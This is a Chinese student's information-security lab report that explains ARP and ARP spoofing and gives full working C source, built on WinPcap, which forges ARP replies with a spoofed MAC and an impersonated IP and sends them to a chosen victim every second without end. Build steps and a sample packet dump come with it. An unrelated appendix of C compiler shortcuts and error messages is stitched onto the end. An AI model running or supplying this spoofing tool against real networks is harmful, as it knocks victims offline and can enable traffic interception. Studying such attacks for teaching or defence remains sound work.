C语言实现ARP攻击（附源码）.doc

信息安全原理 ——ARP攻击 班级：07计算机1班 姓名：胡益铭 学号：E07620112 ARP原理： ARP，即地址解析协议，实现通过IP地址得知其物理地址。在TCP/IP网络环境下，每个主机都分配了一个32位的IP地址，这种互联网地址是在网际范围标识主机的一种逻辑地址。为了让报文在物理网路上传送，必须知道对方目的主机的物理地址。这样就存在把IP地址变换成物理地址的地址转换问题。以以太网环境为例，为了正确地向目的主机传送报文，必须把目的主机的32位IP地址转换成为48位以太网的地址。这就需要在互连层有一组服务将IP地址转换为相应物理地址，这组协议就是ARP协议。 ARP数据报格式如下： 什么是ARP欺骗： 其实，此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首，是网吧老板和网管员的心腹大患。从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。在PC看来，就是上不了网了，“网络掉线了”。 本程序基于C语言，利用winpacp实现往局域网内发自定义的包，以达到ARP欺骗的目的。 首先从http://www.winpcap.org/archive/下载4.0beta1-WpdPack和4.0beta1-WinPcap.exe，版本很多，不过最新版本需要64位的系统，本人32位系统用不了。 直接点击4.0beta1-WinPcap.exe安装，然后在C:\Program Files\WinPcap下打开rpcapd.exe服务。 然后在VC中，Tools→Options→Directories下配置include和library，将4.0beta1-WpdPack中的include和library库包含进去，本人把4.0beta1-WpdPack放在D盘根目录下，结果如下： 然后在Project→Settings→Link→Object/library Modules，在文本框的末尾添加“wpcap.lib packet.lib ws2_32.lib”。 编译运行后按提示输入，内容如下： 1. \Device\NPF_GenericDialupAdapter (Adapter for generic dialup and VPN capture) 2. \Device\NPF_{2A933761-706B-40E1-833D-7209ED0C0467} (WAN (PPP/SLIP) Interface) 3. \Device\NPF_{547462F5-42E8-4FFB-85F9-54DA60C68BFD} (Broadcom NetXtreme Gigabit Ethernet Driver (Microsoft's Packet Scheduler) ) 2是二次拨号的端口，3是本地连接，1不知道是什么，没看懂。这里选择3 输入的接收方MAC地址 00:1C:23:2D:65:44 是我自己的MAC地址，学校寝室的安全貌似做的很好，输入别人的MAC地址出不来东西。 目标IP地址 10.9.190.22 也是我自己的IP 此时生成的包如下： 0 1c 23 2d 65 44 0 1b fc c2 1b b6 8 6 0 1 8 0 6 4 0 2 0 1b fc c2 1b b6 a 9 be 16 0 1c 23 2d 65 44 a 9 be 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 解释如下： 以太网首部： 0 1c 23 2d 65 44 //以太网目的地址，手动输入 0 1b fc c2 1b b6 //以太网源地址，假的，固定 ARP帧： 8 6 //帧类型，0806表示ARP协议 0 1 //硬件类型，0001以太网 8 0 //协议类型，0800IP协议 6 //硬件地址长度 4 //协议地址长度 0 2 //op，01表示请求，02表示回复 0 1b fc c2 1b b6 //发送端以太网地址，同首部中以太网源地址 a 9 be 16 //发送端IP地址，假的，固定 0 1c 23 2d 65 44 //目的以太网地址，同首部中目的地址 a 9 be 16 //目的IP地址，手动输入 填充： 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 此时电脑右下角就会出现如下图的提示，IP地址冲突。 附main.cpp代码如下： #include <stdlib.h> #include <stdio.h> #include <pcap.h> int main() { pcap_if_t *alldevs;//定义一个网络接口的一个节点 pcap_if_t *d; int i=0,inum=0,j; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[60]; pcap_t *adhandle; /* 获得设备列表 */ if (pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } /* 打印列表 */ for(d= alldevs; d != NULL; d= d->next) { printf("%d. %s", ++i, d->name); if (d->description) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } if (i == 0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return 0; } printf("Enter the interface number (1-%d):",i); scanf("%d", &inum); /* 跳转到选中的适配器 */ for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); /* 打开适配器 */ if ( (adhandle= pcap_open_live(d->name, // 设备名 65536, // 要捕捉的数据包的部分 // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容 1, // 混杂模式 1000, // 读取超时时间 errbuf // 错误缓冲池 ) ) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); /* 释放设备列表 */ pcap_freealldevs(alldevs); return -1; } printf("输入被攻击方的MAC地址（如FF-FF-FF-FF-FF-FF则为广播）\n"); scanf("%2x-%2x-%2x-%2x-%2x-%2x",&packet[0],&packet[1],&packet[2],&packet[3],&packet[4],&packet[5]); /* 以太网目的地址*/ /* 以太网源地址，当然是假的 */ packet[6]=0x0e; packet[7]=0x07; packet[8]=0X62; packet[9]=0x00; packet[10]=0X01; packet[11]=0x12; /* 帧类型，0806表示ARP协议 */ packet[12]=0x08; packet[13]=0x06; /* 硬件类型，0001以太网 */ packet[14]=0x00; packet[15]=0x01; /* 协议类型，0800IP协议 */ packet[16]=0x08; packet[17]=0x00; /*硬件地址长度*/ packet[18]=0x06; /*协议地址长度*/ packet[19]=0x04; /* op，01表示请求，02表示回复 */ packet[20]=0x00; packet[21]=0x02; /*发送端以太网地址，同首部中以太网源地址*/ for(i=22;i<28;i++) { packet[i]=packet[i-16]; } /*发送端IP地址*/ printf("输入要假冒的ip地址\n"); scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]); /*目的以太网地址，同首部中目的地址*/ for(i=32;i<38;i++) { packet[i]=packet[i-32]; } /*目的IP地址，手动输入*/ printf("输入被攻击方的ip地址\n"); scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],&packet[41]); /*填充数据*/ for(j=42;j<60;j++) { packet[j]=0x00; } /*在屏幕上输出数据报*/ for(i=0;i<60;i++) { printf("%x ",packet[i]); } //int k=10; /*发送数据报*/ while(1) { pcap_sendpacket(adhandle, packet,60 );//一个装有要发送数据的缓冲区，要发送的长度，和一个适配器 printf("OK\n"); _sleep(1000); //k--; } pcap_close(adhandle); return 0; } 附录资料：不需要的可以自行删除 C语言编译环境中的 调试功能及常见错误提示 调试功能 1．常用健 <F10> : 激活系统菜单 <F6> : 将光标在编辑窗口和、信息窗口之间切换 <F3> : 加载<load>一个文件 <Alt>+<F5> : 查看程序运行结果 <F1> : 得到有关编辑器在线帮助 <Ctrl>+<F1> : 得到有关C语言的在线帮助 <Ctrl>+<Break> : 终止正在运行的程序 2．块操作 <Ctrl> KB: 定义块首 <Ctrl> KK: 定义块尾 <Ctrl> KV: 块移动 <Ctrl> KC: 块复制 <Ctrl> KY: 块删除 <Ctrl> KH: 取消块定义 3．查找、替换和删除操作 <Ctrl> QF: 查找字符串 <Ctrl> QA: 查找并替换字符串 Option: G（全程）， B（向文件头）， N（直接替换） <Ctrl> Y : 删除一行 <Ctrl> QY: 删除从光标位置到行末的所有字符 编译中的常见错误例析 (1)  警告类错误 ‘XXX’declare but never used 变量XXX已定义但从未用过。 ‘XXX’is assigned a value which is never used 变量XXX已赋值但从未用过。 Code has no effect 程序中含有没有实际作用的代码。 Non-portable pointer conversion 不适当的指针转换，可能是在应该使用指针的地方用了一个非0的数值。 Possible use of ‘XXX’before definition 表达式中使用了未赋值的变量 Redeclaration of ‘main’ 一个程序文件中主函数main不止一个。 Suspicious pointer conversion 可疑的指针转换。通常是使用了基本类型不匹配的指针。 Unreachable code 程序含有不能执行到的代码。 (2)  错误或致命错误 Compound statement missing } in function main 程序结尾缺少括号}。 “}”expected； “(”expected等 复合语句或数组初始化的结尾缺少“)”；“（”。 Case outside of switch case 不属于Switch结构，多由于switch结构中的花括号不配对所致。 Case statement missing ‘:’ switch结构中的某个case之后缺少冒号。 Constant expression required 定义数组时指定的数组长度不是常量表达式。 Declaration syntax error 结构体或联合类型的定义后缺少分号。 Declaration was expected 缺少说明，通常是因为缺少分界符如逗号、分号、右圆括号等所引起的。 Default outside switch Default部分放到了switch结构之外，一般是因为花括号不匹配而引起的。 do statement must have while do语句中缺少相应的while部分。 Expression syntax 表达式语法错。如表达式中含有两个连续的运算符 Extra parameter in call ‘fun’ 调用函数fun时给出了多余的实参。 Function should return a value 函数应该返回一个值，否则与定义时的说明类型不匹配。 Illegal use of pointer 指针被非法引用，一般是使用了非法的指针运算。 Invalid pointer addition 指针相加非法。一个指针（地址）可以和一个整数相加，但两个指针不能相加。 Lvalue required 赋值运算的左边是不能寻址的表达式。 Misplaced else 程序遇到了没有配对的else No matching 表达式中的括号不配对。 Pointer required on left side of_> 在“_>”运算的左边只能允许一个指针而不能是一个一般的结构体变量或联合类型的变量。 Statement missing； 程序遇到了后面没有分号的语句。 Too few parameters in call 调用某个函数时实参数目不够。 Unable to open include file ‘XXXXXXXX．XXX’ 头文件找不到。 Unexpected }或:或{ 在不希望的地方使用了}或：{。 Undefined symbol ‘X’in function fun 函数fun中的变量X没有定义。 5.连接中的常见错误 主要错误类似于“undefined symbol _print in modula xxx”(print没有定义)，通常是函数名书写错误。 6.运行中的常见错误 Abnormal program termination 程序异常终止。通常是由于内存使用不当所致。 Floating point error : Domain 或Divide by 0 运算结果不是一个数或被0 除 Null pointer assignment 对未初始化的指针赋值，程序有严重错误。 User break 在运行程序时终止。 7.程序的跟踪调试 利用Run菜单可以进行程序的跟踪调试 （1）       GO to Cursor (<F4>)——选择该选项使程序执行到光标所在行 首先将光标移到某行（一般为可执行），选择该功能项，则程序执行到该行的前一行暂停。此时程序处于跟踪调试状态，并有亮条显示在暂停处，此时可以查询变量或表达式的值。 （2）       Trace into (<F7>)——执行一条语句或一行暂停 此时程序处于跟踪调试状态，并有亮条显示在暂停处。该选项可跟踪到被调函数的内部。 （3）       Step over (<F8>)——执行一条语句或一行暂停 此时程序处于跟踪调试状态，并有亮条显示在暂停处。该选项将自定义函数当作一个语句执行，不跟踪到函程序的内部。 （4）       Debug 菜单 程序处于跟踪状态时，可使用该菜单的选项。 其主要是使用Evaluate——目的是查询或更新变量或表达式的值。 选择Evaluate功能后，系统弹出一个对话框。该对话框包含三个选项区域：Evaluate域可以输入一个含有目前代码中（程序暂停区的作用域）正在使用的变量名、或含变量的表达式、或常量表达式。按回车键后，在Result域中显示变量或表达式的值。还可以用New value域进行调试。 如果调试程序时发现Result域显示的某变量或表达式的值不正确，并能估计出该变量或表达式的值，则可以将该值输入到New value域，继续执行程序，其目的是肯定错误发生处是否在当前位置之前。如果输入这个正确的值并将程序继续执行完毕而结果正确，说明在目前暂停处之前已经发生错误而之后无错误。 （5）       Break/Watch——用于设置断点和监视表达式。 选择Add Watch功能选项，系统将弹出一个菜单，在Add Watch框中输入变量名或表达式，按回车键后，系统在屏幕底部开辟一个窗口并显示 该变量或表达式的值。 【常见错误信息语句索引】 Ambiguous operators need parentheses:不明确的运算需要用括号括起 Ambiguous symbol 'xxx' :不明确的符号 Argument list syntax error:参数表语法错误 Array bounds missing ] in function main 缺少数组界限符 "]" Array bounds missing :丢失数组界限符 Array size too large :数组尺寸太大 Bad character in paramenters :参数中有不适当的字符 Bad file name format in include directive :包含命令中文件名格式不正确 Bad ifdef directive synatax :编译预处理ifdef有语法错 Bad undef directive syntax :编译预处理undef有语法错 Bit field too large :位字段太长 Call of non-function :调用未定义的函数 Call to function with no prototype :调用函数时没有函数的说明 Cannot modify a const object :不允许修改常量对象 Case outside of switch :漏掉了case 语句 Case syntax error :Case 语法错误 Code has no effect :代码不可述不可能执行到 Compound statement missing{ :分程序漏掉"{" Conflicting type modifiers :不明确的类型说明符 Constant expression required :要求常量表达式 Constant out of range in comparison :在比较中常量超出范围 Conversion may lose significant digits :转换时会丢失意义的数字 Conversion of near pointer not allowed :不允许转换近指针 Could not find file 'xxx' :找不到XXX文件 Declaration missing ; :说明缺少"；" Declaration syntax error :说明中出现语法错误 Default outside of switch :Default 出现在switch语句之外 Define directive needs an identifier :定义编译预处理需要标识符 Division by zero :用零作除数 Do statement must have while :Do-while语句中缺少while部分 Enum syntax error :枚举类型语法错误 Enumeration constant syntax error :枚举常数语法错误 Error directive :xxx :错误的编译预处理命令 Error writing output file :写输出文件错误 Expression syntax error :表达式语法错误 Extra parameter in call :调用时出现多余错误 File name too long :文件名太长 Function call missing ) :函数调用缺少右括号 Fuction definition out of place :函数定义位置错误 Fuction should return a value :函数必需返回一个值 Goto statement missing label :Goto语句没有标号 Hexadecimal or octal constant too large :16进制或8进制常数太大 Illegal character 'x' :非法字符x Illegal initialization :非法的初始化 Illegal octal digit :非法的8进制数字 Illegal pointer subtraction :非法的指针相减 Illegal structure operation :非法的结构体操作 Illegal use of floating point :非法的浮点运算 Illegal use of pointer :指针使用非法 Improper use of a typedefsymbol :类型定义符号使用不恰当 In-line assembly not allowed :不允许使用行间汇编 Incompatible storage class :存储类别不相容 Incompatible type conversion :不相容的类型转换 Incorrect number format :错误的数据格式 Incorrect use of default Default使用不当 Invalid indirection 无效的间接运算 Invalid pointer addition 指针相加无效 Irreducible expression tree 无法执行的表达式运算 Lvalue required 需要逻辑值0或非0值 Macro argument syntax error 宏参数语法错误 Macro expansion too long 宏的扩展以后太长 Mismatched number of parameters in definition 定义中参数个数不匹配 Misplaced break 此处不应出现break语句 Misplaced continue 此处不应出现continue语句 Misplaced decimal point 此处不应出现小数点 Misplaced elif directive 不应编译预处理elif Misplaced else 此处不应出现else Misplaced else directive 此处不应出现编译预处理else Misplaced endif directive 此处不应出现编译预处理endif Must be addressable 必须是可以编址的 Must take address of memory location 必须存储定位的地址 No declaration for function 'xxx' 没有函数xxx的说明 No stack 缺少堆栈 No type information 没有类型信息 Non-portable pointer assignment 不可移动的指针（地址常数）赋值 Non-portable pointer comparison 不可移动的指针（地址常数）比较 Non-portable pointer conversion 不可移动的指针（地址常数）转换 Not a valid expression format type 不合法的表达式格式 Not an allowed type 不允许使用的类型 Numeric constant too large 数值常太大 Out of memory 内存不够用 Parameter 'xxx' is never used 能数xxx没有用到 Pointer required on left side of -> 符号->的左边必须是指针 Possible use of 'xxx' before definition 在定义之前就使用了xxx（警告） Possibly incorrect assignment 赋值可能不正确 Redeclaration of 'xxx' 重复定义了xxx Redefinition of 'xxx' is not identical xx的两次定义不一致 Register allocation failure 寄存器定址失败 Repeat count needs an lvalue 重复计数需要逻辑值 Size of structure or array not known 结构体或数给大小不确定 Statement missing ; 语句后缺少"；" Structure or union syntax error X构体或联合体语法错误 Structure size too large 结构体尺寸太大 Sub scripting missing ] 下标缺少右方括号 Superfluous & with function or array 函数或数组中有多余的"&" Suspicious pointer conversion 可疑的指针转换 Symbol limit exceeded 符号超限 Too few parameters in call 函数调用时的实参少于函数的参数不 Too many default cases Default太多(switch语句中一个) Too many error or warning messages 错误或警告信息太多 Too many type in declaration 说明中类型太多 Too much auto memory in function 函数用到的局部存储太多 Too much global data defined in file 文件中全局数据太多 Two consecutive dots 两个连续的句点 Type mismatch in parameter xxx 数xxx类型不匹配 Type mismatch in redeclaration of 'xxx' xx重定义的类型不匹配 Unable to create output file 'xxx' 无法建立输出文件xxx Unable to open include file 'xxx' 无法打开被包含的文件xxx Unable to open input file 'xxx' 无法打开输入文件xxx Undefined label 'xxx' 没有定义的标号xxx Undefined structure 'xxx' 没有定义的结构xxx Undefined symbol 'xxx' 没有定义的符号xxx Unexpected end of file in comment started on line xxx 从xxx行开始的注解尚未结束文件不能结束 Unexpected end of file in conditional started on line xxx 从xxx 开始的条件语句尚未结束文件不能结束 Unknown assemble instruction 未知的汇编结构 Unknown option 未知的操作 Unknown preprocessor directive: 'xxx' 不认识的预处理命令xxx Unreachable code 无路可达的代码 Unterminated string or character constant 字符串缺少引号 User break 用户强行中断了程序 Void functions may not return a value Void类型的函数不应有返回值 Wrong number of arguments 调用函数的参数数目错 'xxx' not an argument xxx不是参数 'xxx' not part of structure xxx不是结构体的一部分 xxx statement missing ( xxx语句缺少左括号 xxx statement missing ) xxx语句缺少右括号 xxx statement missing ; xxx缺少分号 'xxx' declared but never used 说明了xxx但没有使用 'xxx' is assigned a value which is never used 给xxx赋了值但未用过 Zero length structure 结构体的长度为零 【注意】1.不同编译环境的功能或提示可能有差异； 2.部分说明为“经验性”的，仅供参考.